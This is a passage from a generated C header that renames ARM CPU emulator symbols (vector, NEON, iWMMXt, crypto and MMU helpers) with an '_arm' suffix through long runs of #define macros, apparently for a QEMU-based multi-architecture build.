helper_gvec_ands_arm #define helper_gvec_xors helper_gvec_xors_arm #define helper_gvec_ors helper_gvec_ors_arm #define helper_gvec_shl8i helper_gvec_shl8i_arm #define helper_gvec_shl16i helper_gvec_shl16i_arm #define helper_gvec_shl32i helper_gvec_shl32i_arm #define helper_gvec_shl64i helper_gvec_shl64i_arm #define helper_gvec_shr8i helper_gvec_shr8i_arm #define helper_gvec_shr16i helper_gvec_shr16i_arm #define helper_gvec_shr32i helper_gvec_shr32i_arm #define helper_gvec_shr64i helper_gvec_shr64i_arm #define helper_gvec_sar8i helper_gvec_sar8i_arm #define helper_gvec_sar16i helper_gvec_sar16i_arm #define helper_gvec_sar32i helper_gvec_sar32i_arm #define helper_gvec_sar64i helper_gvec_sar64i_arm #define helper_gvec_shl8v helper_gvec_shl8v_arm #define helper_gvec_shl16v helper_gvec_shl16v_arm #define helper_gvec_shl32v helper_gvec_shl32v_arm #define helper_gvec_shl64v helper_gvec_shl64v_arm #define helper_gvec_shr8v helper_gvec_shr8v_arm #define helper_gvec_shr16v helper_gvec_shr16v_arm #define helper_gvec_shr32v helper_gvec_shr32v_arm #define helper_gvec_shr64v helper_gvec_shr64v_arm #define helper_gvec_sar8v helper_gvec_sar8v_arm #define helper_gvec_sar16v helper_gvec_sar16v_arm #define helper_gvec_sar32v helper_gvec_sar32v_arm #define helper_gvec_sar64v helper_gvec_sar64v_arm #define helper_gvec_eq8 helper_gvec_eq8_arm #define helper_gvec_ne8 helper_gvec_ne8_arm #define helper_gvec_lt8 helper_gvec_lt8_arm #define helper_gvec_le8 helper_gvec_le8_arm #define helper_gvec_ltu8 helper_gvec_ltu8_arm #define helper_gvec_leu8 helper_gvec_leu8_arm #define helper_gvec_eq16 helper_gvec_eq16_arm #define helper_gvec_ne16 helper_gvec_ne16_arm #define helper_gvec_lt16 helper_gvec_lt16_arm #define helper_gvec_le16 helper_gvec_le16_arm #define helper_gvec_ltu16 helper_gvec_ltu16_arm #define helper_gvec_leu16 helper_gvec_leu16_arm #define helper_gvec_eq32 helper_gvec_eq32_arm #define helper_gvec_ne32 helper_gvec_ne32_arm #define helper_gvec_lt32 helper_gvec_lt32_arm #define helper_gvec_le32 helper_gvec_le32_arm #define helper_gvec_ltu32 helper_gvec_ltu32_arm #define helper_gvec_leu32 helper_gvec_leu32_arm #define helper_gvec_eq64 helper_gvec_eq64_arm #define helper_gvec_ne64 helper_gvec_ne64_arm #define helper_gvec_lt64 helper_gvec_lt64_arm #define helper_gvec_le64 helper_gvec_le64_arm #define 
helper_gvec_ltu64 helper_gvec_ltu64_arm #define helper_gvec_leu64 helper_gvec_leu64_arm #define helper_gvec_ssadd8 helper_gvec_ssadd8_arm #define helper_gvec_ssadd16 helper_gvec_ssadd16_arm #define helper_gvec_ssadd32 helper_gvec_ssadd32_arm #define helper_gvec_ssadd64 helper_gvec_ssadd64_arm #define helper_gvec_sssub8 helper_gvec_sssub8_arm #define helper_gvec_sssub16 helper_gvec_sssub16_arm #define helper_gvec_sssub32 helper_gvec_sssub32_arm #define helper_gvec_sssub64 helper_gvec_sssub64_arm #define helper_gvec_usadd8 helper_gvec_usadd8_arm #define helper_gvec_usadd16 helper_gvec_usadd16_arm #define helper_gvec_usadd32 helper_gvec_usadd32_arm #define helper_gvec_usadd64 helper_gvec_usadd64_arm #define helper_gvec_ussub8 helper_gvec_ussub8_arm #define helper_gvec_ussub16 helper_gvec_ussub16_arm #define helper_gvec_ussub32 helper_gvec_ussub32_arm #define helper_gvec_ussub64 helper_gvec_ussub64_arm #define helper_gvec_smin8 helper_gvec_smin8_arm #define helper_gvec_smin16 helper_gvec_smin16_arm #define helper_gvec_smin32 helper_gvec_smin32_arm #define helper_gvec_smin64 helper_gvec_smin64_arm #define helper_gvec_smax8 helper_gvec_smax8_arm #define helper_gvec_smax16 helper_gvec_smax16_arm #define helper_gvec_smax32 helper_gvec_smax32_arm #define helper_gvec_smax64 helper_gvec_smax64_arm #define helper_gvec_umin8 helper_gvec_umin8_arm #define helper_gvec_umin16 helper_gvec_umin16_arm #define helper_gvec_umin32 helper_gvec_umin32_arm #define helper_gvec_umin64 helper_gvec_umin64_arm #define helper_gvec_umax8 helper_gvec_umax8_arm #define helper_gvec_umax16 helper_gvec_umax16_arm #define helper_gvec_umax32 helper_gvec_umax32_arm #define helper_gvec_umax64 helper_gvec_umax64_arm #define helper_gvec_bitsel helper_gvec_bitsel_arm #define cpu_restore_state cpu_restore_state_arm #define page_collection_lock page_collection_lock_arm #define page_collection_unlock page_collection_unlock_arm #define free_code_gen_buffer free_code_gen_buffer_arm #define tcg_exec_init tcg_exec_init_arm #define tb_cleanup tb_cleanup_arm #define tb_flush tb_flush_arm #define tb_phys_invalidate tb_phys_invalidate_arm #define tb_gen_code tb_gen_code_arm #define tb_exec_lock tb_exec_lock_arm #define tb_exec_unlock tb_exec_unlock_arm #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_arm #define tb_invalidate_phys_range tb_invalidate_phys_range_arm #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_arm #define tb_check_watchpoint tb_check_watchpoint_arm #define cpu_io_recompile cpu_io_recompile_arm #define tb_flush_jmp_cache tb_flush_jmp_cache_arm #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_arm #define translator_loop_temp_check translator_loop_temp_check_arm #define translator_loop translator_loop_arm #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_arm #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_arm #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_arm #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_arm #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_arm #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_arm #define unassigned_mem_ops unassigned_mem_ops_arm #define floatx80_infinity floatx80_infinity_arm #define dup_const_func dup_const_func_arm #define gen_helper_raise_exception gen_helper_raise_exception_arm #define gen_helper_raise_interrupt gen_helper_raise_interrupt_arm #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_arm #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_arm #define 
gen_helper_cpsr_read gen_helper_cpsr_read_arm #define gen_helper_cpsr_write gen_helper_cpsr_write_arm #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_arm #define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_arm #define arm_cpu_update_virq arm_cpu_update_virq_arm #define arm_cpu_update_vfiq arm_cpu_update_vfiq_arm #define arm_cpu_initfn arm_cpu_initfn_arm #define gt_cntfrq_period_ns gt_cntfrq_period_ns_arm #define arm_cpu_post_init arm_cpu_post_init_arm #define arm_cpu_realizefn arm_cpu_realizefn_arm #define a15_l2ctlr_read a15_l2ctlr_read_arm #define arm_cpu_class_init arm_cpu_class_init_arm #define cpu_arm_init cpu_arm_init_arm #define helper_crypto_aese helper_crypto_aese_arm #define helper_crypto_aesmc helper_crypto_aesmc_arm #define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_arm #define helper_crypto_sha1h helper_crypto_sha1h_arm #define helper_crypto_sha1su1 helper_crypto_sha1su1_arm #define helper_crypto_sha256h helper_crypto_sha256h_arm #define helper_crypto_sha256h2 helper_crypto_sha256h2_arm #define helper_crypto_sha256su0 helper_crypto_sha256su0_arm #define helper_crypto_sha256su1 helper_crypto_sha256su1_arm #define helper_crypto_sha512h helper_crypto_sha512h_arm #define helper_crypto_sha512h2 helper_crypto_sha512h2_arm #define helper_crypto_sha512su0 helper_crypto_sha512su0_arm #define helper_crypto_sha512su1 helper_crypto_sha512su1_arm #define helper_crypto_sm3partw1 helper_crypto_sm3partw1_arm #define helper_crypto_sm3partw2 helper_crypto_sm3partw2_arm #define helper_crypto_sm3tt helper_crypto_sm3tt_arm #define helper_crypto_sm4e helper_crypto_sm4e_arm #define helper_crypto_sm4ekey helper_crypto_sm4ekey_arm #define helper_check_breakpoints helper_check_breakpoints_arm #define arm_debug_check_watchpoint arm_debug_check_watchpoint_arm #define arm_debug_excp_handler arm_debug_excp_handler_arm #define arm_adjust_watchpoint_address arm_adjust_watchpoint_address_arm #define read_raw_cp_reg read_raw_cp_reg_arm #define pmu_init pmu_init_arm #define pmu_op_start pmu_op_start_arm #define pmu_op_finish pmu_op_finish_arm #define pmu_pre_el_change pmu_pre_el_change_arm #define pmu_post_el_change pmu_post_el_change_arm #define arm_pmu_timer_cb arm_pmu_timer_cb_arm #define arm_gt_ptimer_cb arm_gt_ptimer_cb_arm #define arm_gt_vtimer_cb arm_gt_vtimer_cb_arm #define arm_gt_htimer_cb arm_gt_htimer_cb_arm #define arm_gt_stimer_cb arm_gt_stimer_cb_arm #define arm_gt_hvtimer_cb arm_gt_hvtimer_cb_arm #define arm_hcr_el2_eff arm_hcr_el2_eff_arm #define sve_exception_el sve_exception_el_arm #define sve_zcr_len_for_el sve_zcr_len_for_el_arm #define hw_watchpoint_update hw_watchpoint_update_arm #define hw_watchpoint_update_all hw_watchpoint_update_all_arm #define hw_breakpoint_update hw_breakpoint_update_arm #define hw_breakpoint_update_all hw_breakpoint_update_all_arm #define register_cp_regs_for_features register_cp_regs_for_features_arm #define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_arm #define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_arm #define modify_arm_cp_regs modify_arm_cp_regs_arm #define get_arm_cp_reginfo get_arm_cp_reginfo_arm #define arm_cp_write_ignore arm_cp_write_ignore_arm #define arm_cp_read_zero arm_cp_read_zero_arm #define arm_cp_reset_ignore arm_cp_reset_ignore_arm #define cpsr_read cpsr_read_arm #define cpsr_write cpsr_write_arm #define helper_sxtb16 helper_sxtb16_arm #define helper_uxtb16 helper_uxtb16_arm #define helper_sdiv helper_sdiv_arm #define helper_udiv helper_udiv_arm #define helper_rbit helper_rbit_arm 
#define arm_phys_excp_target_el arm_phys_excp_target_el_arm #define aarch64_sync_32_to_64 aarch64_sync_32_to_64_arm #define aarch64_sync_64_to_32 aarch64_sync_64_to_32_arm #define arm_cpu_do_interrupt arm_cpu_do_interrupt_arm #define arm_sctlr arm_sctlr_arm #define arm_s1_regime_using_lpae_format arm_s1_regime_using_lpae_format_arm #define aa64_va_parameters aa64_va_parameters_arm #define v8m_security_lookup v8m_security_lookup_arm #define pmsav8_mpu_lookup pmsav8_mpu_lookup_arm #define get_phys_addr get_phys_addr_arm #define arm_cpu_get_phys_page_attrs_debug arm_cpu_get_phys_page_attrs_debug_arm #define helper_qadd16 helper_qadd16_arm #define helper_qadd8 helper_qadd8_arm #define helper_qsub16 helper_qsub16_arm #define helper_qsub8 helper_qsub8_arm #define helper_qsubaddx helper_qsubaddx_arm #define helper_qaddsubx helper_qaddsubx_arm #define helper_uqadd16 helper_uqadd16_arm #define helper_uqadd8 helper_uqadd8_arm #define helper_uqsub16 helper_uqsub16_arm #define helper_uqsub8 helper_uqsub8_arm #define helper_uqsubaddx helper_uqsubaddx_arm #define helper_uqaddsubx helper_uqaddsubx_arm #define helper_sadd16 helper_sadd16_arm #define helper_sadd8 helper_sadd8_arm #define helper_ssub16 helper_ssub16_arm #define helper_ssub8 helper_ssub8_arm #define helper_ssubaddx helper_ssubaddx_arm #define helper_saddsubx helper_saddsubx_arm #define helper_uadd16 helper_uadd16_arm #define helper_uadd8 helper_uadd8_arm #define helper_usub16 helper_usub16_arm #define helper_usub8 helper_usub8_arm #define helper_usubaddx helper_usubaddx_arm #define helper_uaddsubx helper_uaddsubx_arm #define helper_shadd16 helper_shadd16_arm #define helper_shadd8 helper_shadd8_arm #define helper_shsub16 helper_shsub16_arm #define helper_shsub8 helper_shsub8_arm #define helper_shsubaddx helper_shsubaddx_arm #define helper_shaddsubx helper_shaddsubx_arm #define helper_uhadd16 helper_uhadd16_arm #define helper_uhadd8 helper_uhadd8_arm #define helper_uhsub16 helper_uhsub16_arm #define helper_uhsub8 helper_uhsub8_arm #define helper_uhsubaddx helper_uhsubaddx_arm #define helper_uhaddsubx helper_uhaddsubx_arm #define helper_usad8 helper_usad8_arm #define helper_sel_flags helper_sel_flags_arm #define helper_crc32 helper_crc32_arm #define helper_crc32c helper_crc32c_arm #define fp_exception_el fp_exception_el_arm #define arm_mmu_idx_to_el arm_mmu_idx_to_el_arm #define arm_mmu_idx_el arm_mmu_idx_el_arm #define arm_mmu_idx arm_mmu_idx_arm #define arm_stage1_mmu_idx arm_stage1_mmu_idx_arm #define arm_rebuild_hflags arm_rebuild_hflags_arm #define helper_rebuild_hflags_m32_newel helper_rebuild_hflags_m32_newel_arm #define helper_rebuild_hflags_m32 helper_rebuild_hflags_m32_arm #define helper_rebuild_hflags_a32_newel helper_rebuild_hflags_a32_newel_arm #define helper_rebuild_hflags_a32 helper_rebuild_hflags_a32_arm #define helper_rebuild_hflags_a64 helper_rebuild_hflags_a64_arm #define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_arm #define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_arm #define helper_iwmmxt_madduq helper_iwmmxt_madduq_arm #define helper_iwmmxt_sadb helper_iwmmxt_sadb_arm #define helper_iwmmxt_sadw helper_iwmmxt_sadw_arm #define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_arm #define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_arm #define helper_iwmmxt_mululw helper_iwmmxt_mululw_arm #define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_arm #define helper_iwmmxt_macsw helper_iwmmxt_macsw_arm #define helper_iwmmxt_macuw helper_iwmmxt_macuw_arm #define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_arm #define helper_iwmmxt_unpacklw 
helper_iwmmxt_unpacklw_arm #define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_arm #define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_arm #define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_arm #define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_arm #define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_arm #define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_arm #define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_arm #define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_arm #define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_arm #define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_arm #define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_arm #define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_arm #define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_arm #define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_arm #define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_arm #define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_arm #define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_arm #define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_arm #define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_arm #define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_arm #define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_arm #define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_arm #define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_arm #define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_arm #define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_arm #define helper_iwmmxt_minsb helper_iwmmxt_minsb_arm #define helper_iwmmxt_minsw helper_iwmmxt_minsw_arm #define helper_iwmmxt_minsl helper_iwmmxt_minsl_arm #define helper_iwmmxt_minub helper_iwmmxt_minub_arm #define helper_iwmmxt_minuw helper_iwmmxt_minuw_arm #define helper_iwmmxt_minul helper_iwmmxt_minul_arm #define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_arm #define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_arm #define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_arm #define helper_iwmmxt_maxub helper_iwmmxt_maxub_arm #define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_arm #define helper_iwmmxt_maxul helper_iwmmxt_maxul_arm #define helper_iwmmxt_subnb helper_iwmmxt_subnb_arm #define helper_iwmmxt_subnw helper_iwmmxt_subnw_arm #define helper_iwmmxt_subnl helper_iwmmxt_subnl_arm #define helper_iwmmxt_addnb helper_iwmmxt_addnb_arm #define helper_iwmmxt_addnw helper_iwmmxt_addnw_arm #define helper_iwmmxt_addnl helper_iwmmxt_addnl_arm #define helper_iwmmxt_subub helper_iwmmxt_subub_arm #define helper_iwmmxt_subuw helper_iwmmxt_subuw_arm #define helper_iwmmxt_subul helper_iwmmxt_subul_arm #define helper_iwmmxt_addub helper_iwmmxt_addub_arm #define helper_iwmmxt_adduw helper_iwmmxt_adduw_arm #define helper_iwmmxt_addul helper_iwmmxt_addul_arm #define helper_iwmmxt_subsb helper_iwmmxt_subsb_arm #define helper_iwmmxt_subsw helper_iwmmxt_subsw_arm #define helper_iwmmxt_subsl helper_iwmmxt_subsl_arm #define helper_iwmmxt_addsb helper_iwmmxt_addsb_arm #define helper_iwmmxt_addsw helper_iwmmxt_addsw_arm #define helper_iwmmxt_addsl helper_iwmmxt_addsl_arm #define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_arm #define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_arm #define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_arm #define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_arm #define helper_iwmmxt_align helper_iwmmxt_align_arm #define helper_iwmmxt_insr helper_iwmmxt_insr_arm #define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_arm #define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_arm #define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_arm #define helper_iwmmxt_bcstl 
helper_iwmmxt_bcstl_arm #define helper_iwmmxt_addcb helper_iwmmxt_addcb_arm #define helper_iwmmxt_addcw helper_iwmmxt_addcw_arm #define helper_iwmmxt_addcl helper_iwmmxt_addcl_arm #define helper_iwmmxt_msbb helper_iwmmxt_msbb_arm #define helper_iwmmxt_msbw helper_iwmmxt_msbw_arm #define helper_iwmmxt_msbl helper_iwmmxt_msbl_arm #define helper_iwmmxt_srlw helper_iwmmxt_srlw_arm #define helper_iwmmxt_srll helper_iwmmxt_srll_arm #define helper_iwmmxt_srlq helper_iwmmxt_srlq_arm #define helper_iwmmxt_sllw helper_iwmmxt_sllw_arm #define helper_iwmmxt_slll helper_iwmmxt_slll_arm #define helper_iwmmxt_sllq helper_iwmmxt_sllq_arm #define helper_iwmmxt_sraw helper_iwmmxt_sraw_arm #define helper_iwmmxt_sral helper_iwmmxt_sral_arm #define helper_iwmmxt_sraq helper_iwmmxt_sraq_arm #define helper_iwmmxt_rorw helper_iwmmxt_rorw_arm #define helper_iwmmxt_rorl helper_iwmmxt_rorl_arm #define helper_iwmmxt_rorq helper_iwmmxt_rorq_arm #define helper_iwmmxt_shufh helper_iwmmxt_shufh_arm #define helper_iwmmxt_packuw helper_iwmmxt_packuw_arm #define helper_iwmmxt_packul helper_iwmmxt_packul_arm #define helper_iwmmxt_packuq helper_iwmmxt_packuq_arm #define helper_iwmmxt_packsw helper_iwmmxt_packsw_arm #define helper_iwmmxt_packsl helper_iwmmxt_packsl_arm #define helper_iwmmxt_packsq helper_iwmmxt_packsq_arm #define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_arm #define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_arm #define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_arm #define armv7m_nvic_set_pending armv7m_nvic_set_pending_arm #define helper_v7m_preserve_fp_state helper_v7m_preserve_fp_state_arm #define write_v7m_exception write_v7m_exception_arm #define helper_v7m_bxns helper_v7m_bxns_arm #define helper_v7m_blxns helper_v7m_blxns_arm #define armv7m_nvic_neg_prio_requested armv7m_nvic_neg_prio_requested_arm #define helper_v7m_vlstm helper_v7m_vlstm_arm #define helper_v7m_vlldm helper_v7m_vlldm_arm #define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_arm #define helper_v7m_mrs helper_v7m_mrs_arm #define helper_v7m_msr helper_v7m_msr_arm #define helper_v7m_tt helper_v7m_tt_arm #define arm_v7m_mmu_idx_all arm_v7m_mmu_idx_all_arm #define arm_v7m_mmu_idx_for_secstate_and_priv arm_v7m_mmu_idx_for_secstate_and_priv_arm #define arm_v7m_mmu_idx_for_secstate arm_v7m_mmu_idx_for_secstate_arm #define helper_neon_qadd_u8 helper_neon_qadd_u8_arm #define helper_neon_qadd_u16 helper_neon_qadd_u16_arm #define helper_neon_qadd_u32 helper_neon_qadd_u32_arm #define helper_neon_qadd_u64 helper_neon_qadd_u64_arm #define helper_neon_qadd_s8 helper_neon_qadd_s8_arm #define helper_neon_qadd_s16 helper_neon_qadd_s16_arm #define helper_neon_qadd_s32 helper_neon_qadd_s32_arm #define helper_neon_qadd_s64 helper_neon_qadd_s64_arm #define helper_neon_uqadd_s8 helper_neon_uqadd_s8_arm #define helper_neon_uqadd_s16 helper_neon_uqadd_s16_arm #define helper_neon_uqadd_s32 helper_neon_uqadd_s32_arm #define helper_neon_uqadd_s64 helper_neon_uqadd_s64_arm #define helper_neon_sqadd_u8 helper_neon_sqadd_u8_arm #define helper_neon_sqadd_u16 helper_neon_sqadd_u16_arm #define helper_neon_sqadd_u32 helper_neon_sqadd_u32_arm #define helper_neon_sqadd_u64 helper_neon_sqadd_u64_arm #define helper_neon_qsub_u8 helper_neon_qsub_u8_arm #define helper_neon_qsub_u16 helper_neon_qsub_u16_arm #define helper_neon_qsub_u32 helper_neon_qsub_u32_arm #define helper_neon_qsub_u64 helper_neon_qsub_u64_arm #define helper_neon_qsub_s8 helper_neon_qsub_s8_arm #define helper_neon_qsub_s16 helper_neon_qsub_s16_arm #define helper_neon_qsub_s32 
helper_neon_qsub_s32_arm #define helper_neon_qsub_s64 helper_neon_qsub_s64_arm #define helper_neon_hadd_s8 helper_neon_hadd_s8_arm #define helper_neon_hadd_u8 helper_neon_hadd_u8_arm #define helper_neon_hadd_s16 helper_neon_hadd_s16_arm #define helper_neon_hadd_u16 helper_neon_hadd_u16_arm #define helper_neon_hadd_s32 helper_neon_hadd_s32_arm #define helper_neon_hadd_u32 helper_neon_hadd_u32_arm #define helper_neon_rhadd_s8 helper_neon_rhadd_s8_arm #define helper_neon_rhadd_u8 helper_neon_rhadd_u8_arm #define helper_neon_rhadd_s16 helper_neon_rhadd_s16_arm #define helper_neon_rhadd_u16 helper_neon_rhadd_u16_arm #define helper_neon_rhadd_s32 helper_neon_rhadd_s32_arm #define helper_neon_rhadd_u32 helper_neon_rhadd_u32_arm #define helper_neon_hsub_s8 helper_neon_hsub_s8_arm #define helper_neon_hsub_u8 helper_neon_hsub_u8_arm #define helper_neon_hsub_s16 helper_neon_hsub_s16_arm #define helper_neon_hsub_u16 helper_neon_hsub_u16_arm #define helper_neon_hsub_s32 helper_neon_hsub_s32_arm #define helper_neon_hsub_u32 helper_neon_hsub_u32_arm #define helper_neon_cgt_s8 helper_neon_cgt_s8_arm #define helper_neon_cgt_u8 helper_neon_cgt_u8_arm #define helper_neon_cgt_s16 helper_neon_cgt_s16_arm #define helper_neon_cgt_u16 helper_neon_cgt_u16_arm #define helper_neon_cgt_s32 helper_neon_cgt_s32_arm #define helper_neon_cgt_u32 helper_neon_cgt_u32_arm #define helper_neon_cge_s8 helper_neon_cge_s8_arm #define helper_neon_cge_u8 helper_neon_cge_u8_arm #define helper_neon_cge_s16 helper_neon_cge_s16_arm #define helper_neon_cge_u16 helper_neon_cge_u16_arm #define helper_neon_cge_s32 helper_neon_cge_s32_arm #define helper_neon_cge_u32 helper_neon_cge_u32_arm #define helper_neon_pmin_s8 helper_neon_pmin_s8_arm #define helper_neon_pmin_u8 helper_neon_pmin_u8_arm #define helper_neon_pmin_s16 helper_neon_pmin_s16_arm #define helper_neon_pmin_u16 helper_neon_pmin_u16_arm #define helper_neon_pmax_s8 helper_neon_pmax_s8_arm #define helper_neon_pmax_u8 helper_neon_pmax_u8_arm #define helper_neon_pmax_s16 helper_neon_pmax_s16_arm #define helper_neon_pmax_u16 helper_neon_pmax_u16_arm #define helper_neon_abd_s8 helper_neon_abd_s8_arm #define helper_neon_abd_u8 helper_neon_abd_u8_arm #define helper_neon_abd_s16 helper_neon_abd_s16_arm #define helper_neon_abd_u16 helper_neon_abd_u16_arm #define helper_neon_abd_s32 helper_neon_abd_s32_arm #define helper_neon_abd_u32 helper_neon_abd_u32_arm #define helper_neon_shl_u16 helper_neon_shl_u16_arm #define helper_neon_shl_s16 helper_neon_shl_s16_arm #define helper_neon_rshl_s8 helper_neon_rshl_s8_arm #define helper_neon_rshl_s16 helper_neon_rshl_s16_arm #define helper_neon_rshl_s32 helper_neon_rshl_s32_arm #define helper_neon_rshl_s64 helper_neon_rshl_s64_arm #define helper_neon_rshl_u8 helper_neon_rshl_u8_arm #define helper_neon_rshl_u16 helper_neon_rshl_u16_arm #define helper_neon_rshl_u32 helper_neon_rshl_u32_arm #define helper_neon_rshl_u64 helper_neon_rshl_u64_arm #define helper_neon_qshl_u8 helper_neon_qshl_u8_arm #define helper_neon_qshl_u16 helper_neon_qshl_u16_arm #define helper_neon_qshl_u32 helper_neon_qshl_u32_arm #define helper_neon_qshl_u64 helper_neon_qshl_u64_arm #define helper_neon_qshl_s8 helper_neon_qshl_s8_arm #define helper_neon_qshl_s16 helper_neon_qshl_s16_arm #define helper_neon_qshl_s32 helper_neon_qshl_s32_arm #define helper_neon_qshl_s64 helper_neon_qshl_s64_arm #define helper_neon_qshlu_s8 helper_neon_qshlu_s8_arm #define helper_neon_qshlu_s16 helper_neon_qshlu_s16_arm #define helper_neon_qshlu_s32 helper_neon_qshlu_s32_arm #define helper_neon_qshlu_s64 
helper_neon_qshlu_s64_arm #define helper_neon_qrshl_u8 helper_neon_qrshl_u8_arm #define helper_neon_qrshl_u16 helper_neon_qrshl_u16_arm #define helper_neon_qrshl_u32 helper_neon_qrshl_u32_arm #define helper_neon_qrshl_u64 helper_neon_qrshl_u64_arm #define helper_neon_qrshl_s8 helper_neon_qrshl_s8_arm #define helper_neon_qrshl_s16 helper_neon_qrshl_s16_arm #define helper_neon_qrshl_s32 helper_neon_qrshl_s32_arm #define helper_neon_qrshl_s64 helper_neon_qrshl_s64_arm #define helper_neon_add_u8 helper_neon_add_u8_arm #define helper_neon_add_u16 helper_neon_add_u16_arm #define helper_neon_padd_u8 helper_neon_padd_u8_arm #define helper_neon_padd_u16 helper_neon_padd_u16_arm #define helper_neon_sub_u8 helper_neon_sub_u8_arm #define helper_neon_sub_u16 helper_neon_sub_u16_arm #define helper_neon_mul_u8 helper_neon_mul_u8_arm #define helper_neon_mul_u16 helper_neon_mul_u16_arm #define helper_neon_tst_u8 helper_neon_tst_u8_arm #define helper_neon_tst_u16 helper_neon_tst_u16_arm #define helper_neon_tst_u32 helper_neon_tst_u32_arm #define helper_neon_ceq_u8 helper_neon_ceq_u8_arm #define helper_neon_ceq_u16 helper_neon_ceq_u16_arm #define helper_neon_ceq_u32 helper_neon_ceq_u32_arm #define helper_neon_clz_u8 helper_neon_clz_u8_arm #define helper_neon_clz_u16 helper_neon_clz_u16_arm #define helper_neon_cls_s8 helper_neon_cls_s8_arm #define helper_neon_cls_s16 helper_neon_cls_s16_arm #define helper_neon_cls_s32 helper_neon_cls_s32_arm #define helper_neon_cnt_u8 helper_neon_cnt_u8_arm #define helper_neon_rbit_u8 helper_neon_rbit_u8_arm #define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_arm #define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_arm #define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_arm #define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_arm #define helper_neon_narrow_u8 helper_neon_narrow_u8_arm #define helper_neon_narrow_u16 helper_neon_narrow_u16_arm #define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_arm #define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_arm #define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_arm #define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_arm #define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_arm #define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_arm #define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_arm #define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_arm #define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_arm #define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_arm #define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_arm #define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_arm #define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_arm #define helper_neon_widen_u8 helper_neon_widen_u8_arm #define helper_neon_widen_s8 helper_neon_widen_s8_arm #define helper_neon_widen_u16 helper_neon_widen_u16_arm #define helper_neon_widen_s16 helper_neon_widen_s16_arm #define helper_neon_addl_u16 helper_neon_addl_u16_arm #define helper_neon_addl_u32 helper_neon_addl_u32_arm #define helper_neon_paddl_u16 helper_neon_paddl_u16_arm #define helper_neon_paddl_u32 helper_neon_paddl_u32_arm #define helper_neon_subl_u16 helper_neon_subl_u16_arm #define helper_neon_subl_u32 helper_neon_subl_u32_arm #define helper_neon_addl_saturate_s32 